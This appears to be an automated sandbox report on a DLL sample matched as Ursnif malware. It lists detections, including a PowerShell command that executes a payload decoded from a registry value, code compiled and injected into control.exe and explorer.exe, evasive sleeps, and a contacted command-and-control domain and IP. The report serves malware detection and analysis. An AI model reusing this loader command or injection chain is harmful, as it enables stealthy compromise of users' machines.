Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.436321416.0000000004EC0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.474646332.0000000005840000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.436321416.0000000004EC0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.474646332.0000000005840000.00000004.00000001.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.pdbXP source: powershell.exe, 00000013.00000002.561042649.0000020484316000.00000004.00000001.sdmp
Source: Binary string: c:\922\exact-round\Example\horse\in.pdb source: loaddll32.exe, 00000000.00000002.504641313.000000006DDD0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.507786068.000000006DDD0000.00000002.00020000.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.pdbXP source: powershell.exe, 00000013.00000002.561042649.0000020484316000.00000004.00000001.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.pdb source: powershell.exe, 00000013.00000002.560986791.00000204842CD000.00000004.00000001.sdmp

Data Obfuscation:

Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jqkof1ka\jqkof1ka.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vbpfsg54\vbpfsg54.cmdline'
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD81D62 LoadLibraryA,GetProcAddress, 0_2_6DD81D62
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD82263 push ecx; ret 0_2_6DD82273
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD82210 push ecx; ret 0_2_6DD82219
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0314528F push ecx; ret 0_2_0314529F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00D97AB0 push ecx; ret 4_2_00D97AB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00D97E1F push ecx; ret 4_2_00D97E2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00D9B1DE push esp; iretd 4_2_00D9B26C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_05384EE0 push ecx; ret 4_2_05384EE9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0538528F push ecx; ret 4_2_0538529F
Source: C:\Windows\System32\control.exe Code function: 30_2_0025C4ED push 3B000001h; retf 30_2_0025C4F2

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\jqkof1ka\jqkof1ka.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\vbpfsg54\vbpfsg54.dll

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.397556594.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374227278.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434124521.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.534765366.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434060838.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397622522.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397589601.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.451828519.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434180314.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.433841942.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.451943735.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434086354.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.433993641.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374321927.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.381487289.0000000003D4C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.400741331.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.406917672.0000000004DDC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397430655.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374277769.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.451905542.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374345773.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374301760.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.459171611.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397475800.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.451696004.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397396701.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434150338.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.543947285.000000000F1EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434024374.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.377109820.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.433927552.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374368880.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397343718.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397511011.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374359544.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374253980.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5780, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4604, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 2224, type: MEMORYSTR
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3619
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5092
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5210
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3508
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jqkof1ka\jqkof1ka.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vbpfsg54\vbpfsg54.dll
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2272 Thread sleep time: -10145709240540247s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\loaddll32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_03139386 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 0_2_03139386
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0312CA40 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 0_2_0312CA40
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_03140F53 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 0_2_03140F53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_05380F53 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 4_2_05380F53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_05379386 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 4_2_05379386
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0536CA40 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 4_2_0536CA40
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_03126457 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 0_2_03126457
Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD81D62 LoadLibraryA,GetProcAddress, 0_2_6DD81D62
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_03133E8D ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 0_2_03133E8D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_05373E8D ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 4_2_05373E8D

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: gtr.antoinfer.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 185.228.233.17 80
Allocates memory in foreign processes
Source: C:\Windows\System32\loaddll32.exe Memory allocated: C:\Windows\System32\control.exe base: 2F0000 protect: page execute and read and write
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\vbpfsg54\vbpfsg54.0.cs
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 9B851580
Source: C:\Windows\System32\control.exe Thread created: C:\Windows\explorer.exe EIP: 9B851580
Maps a DLL or memory area into another process
Source: C:\Windows\System32\loaddll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\loaddll32.exe Thread register set: target process: 2224
Writes to foreign memory regions
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6F6E412E0
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 2F0000
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6F6E412E0
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\worVoBJYGD.dll',#1
